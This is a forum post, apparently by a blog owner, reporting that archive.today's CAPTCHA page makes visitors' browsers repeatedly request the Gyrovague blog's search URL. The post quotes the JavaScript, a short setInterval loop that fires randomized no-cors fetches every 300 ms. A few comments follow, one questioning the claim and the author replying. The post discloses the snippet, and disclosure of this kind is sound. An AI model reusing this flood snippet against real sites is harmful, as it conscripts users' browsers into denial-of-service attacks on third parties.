- cross-posted to:
- youshouldknow@lemmy.world
- datahoarder@lemmit.online
- cross-posted to:
- youshouldknow@lemmy.world
- datahoarder@lemmit.online
Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following Javascript
setInterval(function() {
fetch("https://gyrovague.com/?s" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 300);
You must log in or # to comment.
The claim that archive.today is orchestrating a DDoS via CAPTCHA execution contradicts its known architecture, which relies on user agents to fetch content rather than actively injecting malicious payloads into client-side scripts. If the CAPTCHA page is indeed executing arbitrary JavaScript, this suggests a severe supply chain compromise or a misunderstanding of how the service’s proxy network functions. Can you provide the specific user-agent headers or network traces showing the origin of the traffic to distinguish between a botnet hijack and a false positive?
I’ve provided the script at the time this article was posted. You can see that the script is still there but with an updated interval.
relies on user agents to fetch content
huh?
